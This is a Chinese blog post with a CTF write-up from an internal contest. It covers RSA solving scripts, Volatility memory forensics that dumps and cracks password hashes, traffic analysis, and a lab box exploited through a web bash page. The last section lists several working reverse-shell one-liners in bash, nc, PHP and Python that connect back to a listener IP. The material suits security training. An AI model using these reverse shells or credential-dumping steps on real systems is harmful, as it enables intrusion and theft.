【CTF】某次内部基础赛的WP

最新推荐文章于 2022-10-01 20:45:26 发布
最新推荐文章于 2022-10-01 20:45:26 发布
阅读量723 收藏 1
点赞数
分类专栏: CTF 文章标签: python 安全 linux shell
本文为博主原创文章,未经博主允许不得转载。
本文链接:https://blog.csdn.net/X0chitl/article/details/109279437
版权

一、easyRSA

概念

打开文件得到

p = 103555038920563688486313625026692201769898539458250387852564311508516933405369955082868183252437921747101933466087007667680849668502313576809136295602884793383620354213976069518457644401962779239264013411285703750553160265181292953404298124707018302611470630565769393687990084840635760331964051567018109005221 q = 160798213861802381439816685710532500851717370147927179904640319036302461487410794611025319719924785678533804543378265641308730886441049379315313881873126279979745613736918892886654126589571320825140190618381209913572026100319529258246399826498738630096545262116872178571586776849937719267397229131977625729181 c = 3012698302685782914352748889538269539276966689535618390608255019928194822272484165258428510864993115145970175340476111006560843996009634680266411812379484931113572001911187873454962970814784874187267049158327912311464658988809303344617234850467295577263692382589465476940466909919703282508510408666640637321604806184358599109603839798259965266255051960288593974547633368290371444988144846550173058355339504472745816829243793352828596047300963256511623301276249567609305540926013893512398750490710257009878525120075269038340370622356157316429058802630037445446582848958118975401937068492634536362241056432564765409077

利用脚本

from Crypto.Util.number import getPrime,long_to_bytes,bytes_to_long
p = 103555038920563688486313625026692201769898539458250387852564311508516933405369955082868183252437921747101933466087007667680849668502313576809136295602884793383620354213976069518457644401962779239264013411285703750553160265181292953404298124707018302611470630565769393687990084840635760331964051567018109005221
q = 160798213861802381439816685710532500851717370147927179904640319036302461487410794611025319719924785678533804543378265641308730886441049379315313881873126279979745613736918892886654126589571320825140190618381209913572026100319529258246399826498738630096545262116872178571586776849937719267397229131977625729181
c = 3012698302685782914352748889538269539276966689535618390608255019928194822272484165258428510864993115145970175340476111006560843996009634680266411812379484931113572001911187873454962970814784874187267049158327912311464658988809303344617234850467295577263692382589465476940466909919703282508510408666640637321604806184358599109603839798259965266255051960288593974547633368290371444988144846550173058355339504472745816829243793352828596047300963256511623301276249567609305540926013893512398750490710257009878525120075269038340370622356157316429058802630037445446582848958118975401937068492634536362241056432564765409077

def egcd(a, b):
    if a == 0:
      return (b, 0, 1)
    else:
      g, y, x = egcd(b % a, a)
      return (g, x - (b // a) * y, y)
def modinv(a, m):
    g, x, y = egcd(a, m)
    if g != 1:
      raise Exception('modular inverse does not exist')
    else:
      return x % m
e=65537
d=modinv(e,(p-1)*(q-1))
m=pow(c,d,p*q)

flag{this_1s_gi4t_40r_u}

二、Forensic

拿到文件之后先用volatitly -f mem.raw  imageinfo 查看相关信息

1.黑客notepad写的啥,据说是flag?

然后使用命令

volatility -f mem.raw --profile=WinXPSP2x86 notepad

base64解密后得到

flag{W3lec0me_7o_For3n5ics}

2.那么问题来了,黑客登陆的密码是啥?

volatility -f mem.raw --profile=WinXPSP2x86 hashdump            #查看密码

1e581aafa474dfadfdf83fc31e4fd4ea

通过彩虹表NTML解密得到

flag{19950101}

3.发送的机密文件里面到底是什么?

volatility -f mem.raw --profile=WinXPSP2x86 cmdscan   #查询到一个通过nc 上传的可疑文件

P@ssW0rd_is_y0ur_bir7hd4y.zip 

找一下这个NC进程的pid

volatility -f mem.raw --profile=WinXPSP2x86 pslist #查询进程

用下面这个命令将进程nc.exe    dump下来

sudo volatility -f mem.raw --profile=WinXPSP2x86  memdump -p 120 -D ./

然后分离一下

sudo foremost 120.dmp

发现很多zip都需要密码 我们使用密码爆破工具

注意提示:P@ssW0rd_is_y0ur_bir7hd4y.txt  尝试8为数字爆破

打开ziperello

选择下一步

选择暴力破解

因为生日有可能是 19970101这种 所以选择8位

flag{Thi5_Is_s3cr3t!}

三、流量分析

用wireshark打开流量包  发现一个flag.zip

导出字节流

生成一个zip的压缩文件 但是需要密码

分析上述数据包

key{I'm_Blue_Are_you_ok}

四、hardyRsa

相关概念

打开题目给了一个 公钥和一个加密文件,先用openssl解析n 然后将n分解

openssl rsa -pubin -text -modulus -in warmup -in rsa_public_key.pem

先将n转为10进制数如果数比较大,那就需要将数保存成一个txt

yafu-x64 "factor(@)" -batchfile data.txt

分解出来 p、q

利用脚本 生成私钥

import math
import sys

from Crypto.Math.Numbers import Integer
from Crypto.PublicKey import RSA
import math
import random
import base64
def egcd(a, b):
    if a == 0:
      return (b, 0, 1)
    else:
      g, y, x = egcd(b % a, a)
      return (g, x - (b // a) * y, y)
def modinv(a, m):
    g, x, y = egcd(a, m)
    if g != 1:
      raise Exception('modular inverse does not exist')
    else:
      return x % m




e = 65537

n = 30064958471180141352963255964320727764941087854957385562672821662319854021395100968823341108075020928542437446993994119863902565874355296188498304761389336438421889636409561936141985786801002923752627293790265351723795968412774268086467114263767947693310444934316205390814185802517514694528501333851255084653925181726978734804806707740444755908398751964899143494522781405457103697373868972836201511424363601490903086488506985489526910314474245106338585623571369549388434865567951986866445306840505397268281889886738015891982162371413136885989746931929787765617838750381226036784122498143172854419447324975505933540511

p = 57970027

q = 518629368090170828331048663550229634444384299751272939077168648935075604180676006392464524953128293842996441022771890719731811852948684950388211907532651941639114462313594608747413310447500790775078081191686616804987790818396104388332734677935684723647108960882771460341293023764117182393730838418468480006985768382115446225422781116531906323045161803441960506496275763429558238732127362521949515590606221409745127192859630468854653290302491063292735496286233738504010613373838035073995140744724948933839238851600638652315655508861728439180988253324943039367876070687033249730660337593825389358874152757864093


u = Integer(p).inverse(q)

keypair = RSA.RsaKey(n=n, e=e, d=modinv(e,(p-1)*(q-1)), p=p, q=q, u =u)

private = open('rsa_private_key.pem','wb')
private.write(keypair.exportKey())
private.close()

得到flag

flag{vvvvvv_4act0rdb_c0m}

五、WEB题

Escalate_my_privilege 靶机

本地复现IP:http://192.168.12.129/

nmap扫描端口搜索信息

nmap -sT 192.168.12.129

然后dirsearch扫下目录

python3 dirsearch.py -u http://192.168.12.129/ -e *

http://192.168.12.129//readme.txt  提示查看backup目录

http://192.168.12.129//robots.txt  有个phpbash.php 文件

发现可以执行bash命令

这个页面不好操作,我们直接在kali上监听端口 反弹shell

kali上设置端口监听

在bash上输入

bash -i >& /dev/tcp/192.168.12.128/8888 0>&1

shell反弹成功

其他的反弹shell的方法:

其他的反弹shell的方法:
bash -i >& /dev/tcp/192.168.12.128/8888 0>&1
nc -e /bin/bash 192.168.1.146 7777
php -r 'exec("/bin/bash -i >& /dev/tcp/192.168.1.146/7777");'
php -r '$sock=fsockopen("ip",port);exec("/bin/bash -i <&3 >&3 2>&3");'
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.12.128',7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

 

学习地址 https://www.jianshu.com/p/6aca9b29514d

因为知道密码直接下面命令提权

su -l

Best of Luck 628435356e49f976bab2c04948d22fe4

X1sir
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BUU-CTF——WP(Cryptp[1~30])
hahaha233330的博客
09-14 1183
好久没更新了,手生得很,重新练起来! 这次挑战BUU,贴一下网址:点我 Cryptp 1、MD5 直接把文本复制用url解码一下即可得到flag 2、Url编码 直接把文本复制用url解码一下即可得到flag。 3、看我回旋踢 文本为不规则排列,猜测是凯撒密码,用工具解密,多试几次得到以"flag"开头的排列。 4、一眼就解密 啊这 5、摩丝 摩斯电码解密得到,直接解码是全小写,但这道题正确flag为全大写。 6、签到 草 7、password 这题没什么意思,就是名字缩写+生日
ctf的每天wp
dotbs的博客
04-08 642
我的第一次博客写作,ctf的每天wp**1.单身二十年** 1.单身二十年 题目地址:http://ctf.nuptzj.cn/challenges# 拿到这道题第一时间就点到超链接标签,但没有显示flag,后退一步右击超链接审查元素,发现元素显示”search.key.php “。但实际的跳转链接是:“no_key_is_here_forever.php “ 解法一:接下来点击网络,勾选持续日志...
ctf wp
qq_63267612的博客
04-03 2823
文章目录被嗅探的流量镜子里的世界隐藏的钥匙另外一个世界神秘龙卷风[第一章 web入门]常见的搜集web签到 被嗅探的流量 下载后打开题目没有思路,查看别人的wp发现是文件传输找POST的包,用wireshark追踪http流量 http.request.method==POST在文件末尾找到flag 镜子里的世界 打开后是一张图片,隐写套路,查看属性,用winhex打开都没发现什么有用的信息,这时注意到图片名steg想到了用stegslove打开图片,查看图片并没有发现有用的信息,调整后发现flag 隐
CTF部分wp
1stPeak's Blog
09-23 1698
1、签到题 Base64解密 2、取证分析 链接:https://pan.baidu.com/s/1ApHO_UnIzKyK2TDNOxzaEQ 提取码:7fh4 使用vi -r 查看,cat有时也可行 3、图片隐写 题目: (1)使用Imagej打开该图片 (2)依次选择Process-Math-XOR,XOR值为10011111 (3)依稀发现隐藏的flag,ctrl+shift+T调节颜色,找到flag 4、数据包分析 链接:https://pan.baidu.com/s/16YgH
CTF攻防世界--web题的wp
weixin_43803070的博客
05-18 8363
Linux的系统光盘,当然想到了在Linux下进行挂载了。 打开虚拟机: root@kali:~# strings '/root/桌面/linux' | grep flag //strings - 显示文件中的可打印字符 strings 一般用来查看非文本文件的内容. root@kali:~# sudo mount '/root/桌面/linux' /mnt //将文件挂载到/...
对于一些CTF写的wp.zip
最新发布
09-30
项目源码
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
CTF Attack & Defense线下攻防技巧.pdf
01-15
CTF Attack & Defense线下攻防技巧》是一份深度探讨网络安全策略的重要资源,主要涉及CTF(Capture The Flag)比中的攻击与防守技巧。这类比是网络安全领域的一种实战训练,旨在提升参者在实际...
CTF思路总结 PPT 含学习链接
09-13
信息收集 代码审计 web漏洞汇总 工具使用技巧 高级漏洞利用 web思路
CTF信息安全单项选择题.docx
01-25
CTF信息安全单项选择题.
CTF实验吧 这就是一个坑wp (明文攻击)
ADreamClusive的博客
08-07 9811
这就是一个坑wp 我们打开压缩包的tips.txt,里面提示:密码是十位大小写字母、数字、特殊符号组成的,你爆破的开么?! 这个tip告诉我们爆破是基本不可能了 然后我们发现falg.zip里面也有个tips.txt,然后我猜想flag.zip里面的tips.txt和另外一个tip
CTFShow“萌心区”WP(上)
Aluxian_的博客
05-22 1147
CTFShow “萌新区”WP详解萌新认证萌新_密码1萌新_密码2萌新_密码3萌新_密码3隐写1隐写2萌新 隐写2萌新 隐写3萌新 隐写4萌新 隐写5萌新隐写6Audacity CTFShow 平台:https://ctf.show/ 萌新认证 纯签到题 直接在公告找 或者输入萌新码 注意:萌新码是从一个固定池里随机分配的,不是统一的。 萌新_密码1 先进行base16 解码 然后解码出来的字符有= 结尾 感觉是base64 得到一串像flag 的字符串 然后在使用 栅栏密码 栏数为2 最后
CG-CTF——WP(WEB[一])
hahaha233330的博客
12-03 1290
CG-CTF——WriteUp(一) 工具: ①Winhex:图片隐写工具,可通过搜索“ctf”“CTF”“key”“flag”等关键字得到flag。 ②在线工具HtmlEncode/BASE64转换:注意源代码里奇怪的字符串,可以尝试解码(分清类型)。 ③BurpSuite:抓包工具,这个很好用。 ④Wireshark:抓包工具。使用说明: 1、签到题 直接F12查看源代码就可以得到flag...
BUU-CTF——WP(MISC[21~n])
hahaha233330的博客
10-06 1196
挑战BUU,贴一下网址:BUU-CTF MISC 继续~ 在线工具:Ook!、brainfuck转字符 21. FLAG 22. 另外一个世界 拖入010editor,拉到最后发现:01101011011011110110010101101011011010100011001101110011 二进制转字符串得到flag。 23. 假如给我三天光明 看最下面一排,感觉是盲文,去找盲文表对照即可得到密码kmdonowg。 解压后得到音频文件,拖入Audacity,猜测对应摩斯密码:-.-. - …-.
ctf-wp-spider
dahege666的博客
12-18 503
知识点:反击动态怕从、AJAX、扫目录(robots.txt)、Redis Getshell 扫目录后找到robots.txt,访问目录有得到/get_sourcecode目录提示, 访问后提示 NOT 127.0.0.1,不是本机地址,所以只能是本地的服务器才能访问,这种情况很常见的就是增加一个X-Forwarded-For头,但是在这个题中加个这个头部信息也是无法绕过的, 可以通过爬虫读取源代码, 上传脚本后可以读取到页面的全部源代码 源代码中有一个hint提...
ctfshow大部分wp(附带个人整理知识笔记)
ZxC789456302的博客
10-01 7232
WEB信息搜集入门(前10道都是水题,10题后没有水题了)源码中即为flag(签到题)前端js拦截,查看源代码即可,得到flagflag在响应头里面在访问robots.txt,得知存在flagishere.txt文件,访问获得flagphps源码泄露,访问index.phps,下载文件打开得到flag访问www.zip获取配置文件得知在服务器下存在fl000g.txt,线上访问得到flag访问.git(隐藏文件)注意格式为/.git/,得到flag隐藏文件的第二种情况,访问.svn,格式为/.svn/,得到
2021-6-8:参加CTFWP
Hammers_12的博客
06-08 1667
一、Sign_in 简单web题 正常思路先看一下源码 按F12 后看到答案 二、签到 简单Misc题 打开以后 看到有问题和文件夹可以选择 直接选到底 直接得到flag 三、简单题 Reverse简单题 直接打开附件 给出附件为getflag.c文件, 可以看出,flag即为FJZ{1jf11dm4hpns9k0wk2s}的解密 char *caesar_f(char * passwd) { int i,j...
CTF show misc之旅 (wp详解一部分)
路baby的博客
06-18 2676
让我们开启ctf misc之旅吧 加油 感谢ctf show平台提供题目 杂项签到,misc2,Miscx,misc50,misc30,stega1,misc3,misc40,misc30,红包题第一弹,stega10,stega11,misc4,misc31,misc49,misc6,misc7,misc8,红包题第五弹,stega2,stega3..................
SarCTF Writeup题解 Red King、Confidential
SBBTD的博客
02-18 917
2020-SarCTF ctftime链接:https://ctftime.org/event/975/ 0x01【Stego】Red King 描述:Just Moriarty? Really? wp:用Stegsolve,导出数据 Red / Column / LSB: In 1989, Moriarty murder ed . Carl Pow ers, whom he cla i...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值